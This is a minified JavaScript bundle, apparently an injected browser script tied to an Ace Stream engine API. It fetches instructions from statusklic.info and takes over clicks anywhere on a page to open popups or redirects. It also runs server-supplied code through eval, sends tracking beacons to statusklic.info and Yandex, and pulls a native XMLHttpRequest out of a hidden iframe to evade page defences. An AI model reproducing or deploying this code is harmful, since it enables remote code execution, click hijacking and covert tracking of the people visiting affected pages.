var $jscomp=$jscomp||{};$jscomp.scope={};$jscomp.checkStringArgs=function(d,g,l){if(null==d)throw new TypeError("The 'this' value for String.prototype."+l+" must not be null or undefined");if(g instanceof RegExp)throw new TypeError("First argument to String.prototype."+l+" must not be a regular expression");return d+""};$jscomp.ASSUME_ES5=!1;$jscomp.ASSUME_NO_NATIVE_MAP=!1;$jscomp.ASSUME_NO_NATIVE_SET=!1;
$jscomp.defineProperty=$jscomp.ASSUME_ES5||"function"==typeof Object.defineProperties?Object.defineProperty:function(d,g,l){d!=Array.prototype&&d!=Object.prototype&&(d[g]=l.value)};$jscomp.getGlobal=function(d){return"undefined"!=typeof window&&window===d?d:"undefined"!=typeof global&&null!=global?global:d};$jscomp.global=$jscomp.getGlobal(this);
$jscomp.polyfill=function(d,g,l,c){if(g){l=$jscomp.global;d=d.split(".");for(c=0;c<d.length-1;c++){var f=d[c];f in l||(l[f]={});l=l[f]}d=d[d.length-1];c=l[d];g=g(c);g!=c&&null!=g&&$jscomp.defineProperty(l,d,{configurable:!0,writable:!0,value:g})}};
$jscomp.polyfill("String.prototype.startsWith",function(d){return d?d:function(d,l){var c=$jscomp.checkStringArgs(this,d,"startsWith");d+="";var f=c.length,k=d.length;l=Math.max(0,Math.min(l|0,c.length));for(var e=0;e<k&&l<f;)if(c[l++]!=d[e++])return!1;return e>=k}},"es6","es3");
(function(){function d(g,l,c){function f(e,p){if(!l[e]){if(!g[e]){var u="function"==typeof require&&require;if(!p&&u)return u(e,!0);if(k)return k(e,!0);p=Error("Cannot find module '"+e+"'");throw p.code="MODULE_NOT_FOUND",p;}p=l[e]={exports:{}};g[e][0].call(p.exports,function(c){return f(g[e][1][c]||c)},p,p.exports,d,g,l,c)}return l[e].exports}for(var k="function"==typeof require&&require,e=0;e<c.length;e++)f(c[e]);return f}return d})()({1:[function(d,g,l){var c=d("BaseUtils.js"),f=d("EngineApiBase.js");
(function(d){function e(a,q){q===d&&(q=0);if(!(q>=a.length)){var m=a[q];var b=m.c2&&n?m.c2:m.c;var c=m.at,f=m.ae;b?h.xhr({url:b,callback:function(b,n){n==d&&(n=-100);var g=0;1==c?(b&&(g=b.success&&b.code?1:2,t(m.p)),1==g?k(2,f,b.code,m.p):e(a,q+1)):2==c?(b&&(g=b.length&&b[0].url?1:2,t(m.p)),1==g?k(1,f,b[0].url,m.p):e(a,q+1)):3==c?(b&&(g=b.success&&b.code?1:2,t(m.p)),1==g?k(2,f,b.code,m.p,b.beacon):(b&&b.code&&h.runCode(b.code),e(a,q+1))):4==c?(b&&(g=b.success&&b.code?1:2,t(m.p)),1==g?k(1,f,b.code,
m.p,b.beacon):e(a,q+1)):5==c?(b?(g=b.success&&b.url?1:2,t(m.p)):204==n&&(g=2),1==g?k(1,f,b.url,m.p,b.beacon):e(a,q+1)):g=3;h.event("arstatus",{p:m.p,s:g,err:n})}}):m.u&&k(m.t||1,f,m.u,m.p)}}function k(a,b,m,f,c){h.attachEvent(window,"click",function(){w(a,b,m,f,c)})}function l(a){var b=window.open("about:blank");if(b){var h=1;b.document.write(a)}else h=2;return h}function g(a,b,f){1==b&&("f6e577683f7000c9e76d07af2632b592"==a?h.ya(45349725):"94747a1470803117683bc8fad40ce2ec"==a&&h.ya(45349755));h.setClicked("gen_clk");
a={p:a,s:b};f&&(a.ed=JSON.stringify(f));h.event("click",a)}function w(a,b,c,e,d){if(!h.isClicked("gen_clk")){var q=0,m=!1,k=null;d&&h.imageRequest(d);1==a?(c=h.cleanupUrl(c),n&&b?(k=c,k=-1==k.indexOf("?")?k+"?":k+"\x26",k+="_abc_gid\x3d87349",m=!0,f.getEngineStatus(function(a){a&&3012001<=a.version?(n=!0,f.openUrl(k,function(a){"ok"===a?g(e,1,{ch:2}):g(e,12)})):(n=!1,g(e,13))})):(a=c,a.startsWith("//")||a.startsWith("http://")||a.startsWith("https://")||(a="//"+a),q=window.open(a)?1:2)):2==a?(n&&
(k=h.getUrlFromCode(e,c)),n&&b&&k?(m=!0,f.getEngineStatus(function(a){a&&3012001<=a.version?(n=!0,f.openUrl(k,function(a){"ok"===a?g(e,1,{ch:2}):g(e,12)})):(n=!1,g(e,13))})):q=l(c)):q=3==a?h.runCode(c)?1:20:10;m||g(e,q,{ch:1})}}function t(a){h.resetClicked("inv_clk_"+a);h.attachEvent(window,"click",function(){h.isClicked("inv_clk_"+a)||(h.setClicked("inv_clk_"+a),h.event("click",{p:"inv_"+a}))})}var r=window.localStorage,b={},n=!1,x=!1,v=3E5;if(!window._statusklic_loaded){window._statusklic_loaded=
!0;var h={isClicked:function(a){var h;if(h=b[a])return!0;r&&(h=r.getItem(a));return h},setClicked:function(a){b[a]=!0;r&&r.setItem(a,"true")},resetClicked:function(a){b[a]=!1;r&&r.removeItem(a)},attachEvent:function(a,b,h){return a.addEventListener?a.addEventListener(b,h,!1):a.attachEvent("on"+b,h)},now:function(){return(new Date).getTime()},getHost:function(){return window.location.protocol+"//"+window.location.host},isNative:function(a){return/\{\s+\[native code\]/.test(Function.prototype.toString.call(a))?
!0:!1},getNative:function(a){var b=document.createElement("iframe");b.style.display="none";document.documentElement.appendChild(b);return{obj:b.contentWindow[a],container:b}},removeNativeContainer:function(a){document.documentElement.removeChild(a)},cookiesEnabled:function(){if(navigator.cookieEnabled)return!0;document.cookie="cookietest\x3d1";var a=-1!=document.cookie.indexOf("cookietest\x3d");document.cookie="cookietest\x3d1; expires\x3dThu, 01-Jan-1970 00:00:01 GMT";return a},checkUrl:function(a){return a.match(/\.(jpg|png|jpeg|gif|bmp|doc|pdf|xls|js|xml|doc|docs|txt|css)$/)?
!1:!0},makeParams:function(a){var b,h=[];for(b in a){var c=a[b];null!==c&&c!==d&&h.push(b+"\x3d"+encodeURIComponent(c))}return h.join("\x26")},xhr:function(a){function b(b,c){"function"===typeof a.callback&&(a.callback(b,c),f&&h.removeNativeContainer(f.container))}var c=window.XMLHttpRequest;if(!h.isNative(c)){var f=h.getNative("XMLHttpRequest");c=f.obj}var e=new c,k=d,n=!1;a.timeout=a.timeout||1E4;if(!a.url)throw new "missing url";"//"==a.url.substring(0,2)&&(a.url=window.location.protocol+a.url);
e.withCredentials=!0;e.onreadystatechange=function(){if(n)b(null,-1);else if(4===e.readyState)if(200===e.status&&e.responseText){k&&clearTimeout(k);try{var a=JSON.parse(e.responseText)}catch(z){console.log("failed to parse response: "+z);b(null,1001);return}b(a)}else b(null,e.status)};e.open("GET",a.url);k=setTimeout(function(){n=!0;e.abort()},a.timeout);e.send()},makeEventUrl:function(a,b){b=b||{};b._r=Math.random();b.e=a;b.h=h.getHost();return"//statusklic.info/event?"+h.makeParams(b)},event:function(a,
b){a=h.makeEventUrl(a,b);h.imageRequest(a)},ya:function(a){h.imageRequest("https://mc.yandex.ru/watch/"+a)},imageRequest:function(a){(new Image).src=a},stripCode:function(a){a=a.replace(/<script[^>]*>/g,"");return a=a.replace(/<\/script>/g,"")},runCode:function(a){a=h.stripCode(a);try{return eval(a),!0}catch(q){return!1}},getUrlFromCode:function(a,b){var e=null,f,k;if("94747a1470803117683bc8fad40ce2ec"===a){var d="_obj_"+c.guid("_");a=b.replace("function s(){",'function s(){window["'+d+'"] \x3d {url: o}; return;');
h.runCode(a)?window[d]&&window[d].url&&(e=window[d].url):((a=/var o="([^"]+)"/.exec(b))&&(f=a[1]),(a=/\}else\{a="(http:\/\/\w+\.com\/cr\?[^"]+)"/.exec(b))&&(k=a[1]),f&&k&&(f=f.replace(/\\\//g,"/"),e=k+encodeURIComponent(f)));return e}if("f6e577683f7000c9e76d07af2632b592"===a)return(a=/top\.location\.href='([^']+)'/.exec(b))&&(d=a[1]),(a=/encodeURIComponent\('([^']+)'\)/.exec(b))&&(f=a[1]),d&&f&&(e=d+encodeURIComponent(f)),e},checkEngineTask:function(){f.getEngineStatus(function(a){n=a?3012001<=a.version:
!1;setTimeout(h.checkEngineTask,v)})},cleanupUrl:function(a){var b=a.indexOf("\x3c");0<=b&&(a=a.substring(0,b));return a}};if(h.checkUrl(location.href)){h.resetClicked("gen_clk");h.resetClicked("v_clk");var A="//statusklic.info/get/cu?h\x3d"+h.getHost()+"\x26ck\x3d"+(h.cookiesEnabled()?1:0)+"\x26_r\x3d"+Math.random();h.xhr({url:A,callback:function(a,b){if(a&&a.result){x=1===a.result.aue;v=parseInt(a.result.cei)||3E5;if(a.result.p){b=!1;if(x)for(var c=0;c<a.result.p.length;c++)if(a.result.p[c].c2){b=
!0;break}x&&b?f.getEngineStatus(function(b){b&&(n=3012001<=b.version)&&setTimeout(h.checkEngineTask,v);e(a.result.p)}):e(a.result.p)}a.result.vc&&h.attachEvent(window,"click",function(){h.isClicked("v_clk")||(h.setClicked("v_clk"),h.event("click",{p:"inv"}))})}}})}}})()},{"BaseUtils.js":2,"EngineApiBase.js":3}],2:[function(d,g,l){function c(c){var f,e=[];for(f in c){var d=c[f];null!==d&&void 0!==d&&e.push(f+"\x3d"+encodeURIComponent(d))}return e.join("\x26")}g.exports={makeQueryString:c,buildUrl:function(f,
d){(d=c(d))&&(f=-1===f.indexOf("?")?f+("?"+d):f+("\x26"+d));return f},guid:function(c){function d(){return Math.floor(65536*(1+Math.random())).toString(16).substring(1)}c=c||"-";return d()+d()+c+d()+c+d()+c+d()+c+d()+d()+d()}}},{}],3:[function(d,g,l){function c(b,c){return"function"===typeof window[b]?window[b]:c}function f(b,c){if("function"===typeof r[b])return c?r[b].apply(null,c):r[b].call(null)}function k(b){e({method:"get_api_access_token",onsuccess:function(c){c&&c.token?b(c.token):(p.log("getApiAccessToken: malformed response: "+
JSON.stringify(c)),b(null))},onerror:function(){b(null)}})}function e(b){function c(c){p.log("engineapi:request failed: "+c);"function"===typeof b.onerror&&b.onerror.call(null,c)}try{if(!b.method)throw"missing method";b.params||(b.params={});b.api||(b.api="server");if(b.needToken){if(null===t){k(function(d){null===d?c("cannot get api access token"):(t=d,b.params.token=d,e(b))});return}b.params.token=t}b.params.method=b.method;if("server"==b.api)var d="http://127.0.0.1:6878/server/api";else if("service"==
b.api)d="http://127.0.0.1:6878/webui/api/service";else throw"unknown api: "+b.api;var g=d+"?"+w.makeQueryString(b.params);y.xhr({method:"GET",url:g,timeout:1E4,onload:function(d){if(200==d.status)try{var e=JSON.parse(d.responseText);e.error?c(e.error):e.result?"function"===typeof b.onsuccess&&b.onsuccess.call(null,e.result):c("malformed response from engine")}catch(a){c(a)}else c("bad http status: "+d.status),0===d.status&&f("acestream-hook-engine-request-failed",[b.method])},onerror:function(d){c("status\x3d"+
d.status+" text\x3d"+d.statusText);f("acestream-hook-engine-request-failed",[b.method])}})}catch(h){p.log("sendRequest: "+h)}}function u(b,c,d){try{y.xhr({method:"GET",url:"http://127.0.0.1:6878/webui/api/service?method\x3dget_version",timeout:1E4,onload:function(e){var f="",g=null,a=0;200==e.status?(e=JSON.parse(e.responseText),e.error?(a=0,g=null,f=e.error):e.result?(a=parseInt(e.result.code),isNaN(a)&&(a=0),g=e.result.version):(a=0,g=null,f="malformed response from engine")):(a=0,g=null,f="engine returned error: "+
e.status);f&&p.log("checkEngine: error: "+f);"function"===typeof b&&(!a&&void 0!==c&&0<c?(p.log("AWE: check engine failed ("+c+"), next try in "+d),window.setTimeout(function(){u(b,c-1,d)},d)):b.call(null,{running:!!a,versionCode:a,versionString:g}))},onerror:function(){b.call(null,{running:!1,versionCode:0,versionString:null})}})}catch(v){p.log("checkEngine: error: "+v)}}var p=d("Logging.js"),y=d("xhr.js"),w=d("BaseUtils.js"),t=null,r={};d=c("AWE_engineStatus",function(b){if("function"!==typeof b)throw"missing callback in getEngineStatus()";
u(function(c){c.running?b.call(null,{running:c.running,version:c.versionCode}):b.call(null,{running:!1,version:0})})});g.exports={HOOK_PLAYLIST_ADD_IFRAME_CLOSED:"acestream-hook-playlist-add-iframe-closed",HOOK_ENGINE_REQUEST_FAILED:"acestream-hook-playlist-add-iframe-closed",checkEngine:u,sendRequest:e,addHook:function(b,c){r[b]=c},callHook:f,wrapGlobalFunc:c,getEngineStatus:d,openUrl:function(b,c){if("function"!==typeof c)throw"EngineApi:openUrl: callback must be a function";e({method:"open_url",
needToken:!1,params:{url:b,where:"same",new_window:1},onsuccess:function(b){c(b)},onerror:function(){c(null)}})}}},{"BaseUtils.js":2,"Logging.js":4,"xhr.js":5}],4:[function(d,g,l){function c(c){try{"function"===typeof GM_log?GM_log(c):console.log(c)}catch(u){k&&console.error("errore in logging: "+u)}}var f=[],k=!1;g.exports={log:c,verbose:function(d){k&&c(d)},dumpLogs:function(){var c=window.$;if(c){var d=c("\x3cdiv\x3e").css({position:"fixed",top:0,left:0,right:0,bottom:0,overflow:"auto",padding:"8px",
"background-color":"#fff","font-size":"11px",color:"#000","z-index":"2147482900"}),g=c("\x3ctextarea\x3e");g.css({width:"calc(100% - 16px)",height:"90%"});d.append(g);var k=c("\x3cbutton\x3e");k.html("Close");k.on("click",function(){d.remove()});d.append(k);for(k=0;k<f.length;k++)g.append(f[k]+"\n");c("body").append(d)}},setVerbose:function(c){k=c}}},{}],5:[function(d,g,l){g.exports={xhr:function(c){if("function"===typeof GM_xmlhttpRequest)return GM_xmlhttpRequest(c);var d=new window.XMLHttpRequest,
g=void 0,e=!1;if(!c.url)throw new "missing url";c.method=c.method||"GET";c.timeout=c.timeout||1E4;void 0!==c.withCredentials&&(d.withCredentials=c.withCredentials);"//"==c.url.substring(0,2)&&(c.url=window.location.protocol+c.url);d.onreadystatechange=function(){if(e){if("function"===typeof c.onerror)c.onerror(d)}else if(4===d.readyState&&(g&&clearTimeout(g),"function"===typeof c.onload))c.onload(d)};d.open(c.method,c.url);g=setTimeout(function(){e=!0;d.abort()},c.timeout);d.send()}}},{}]},{},[1]);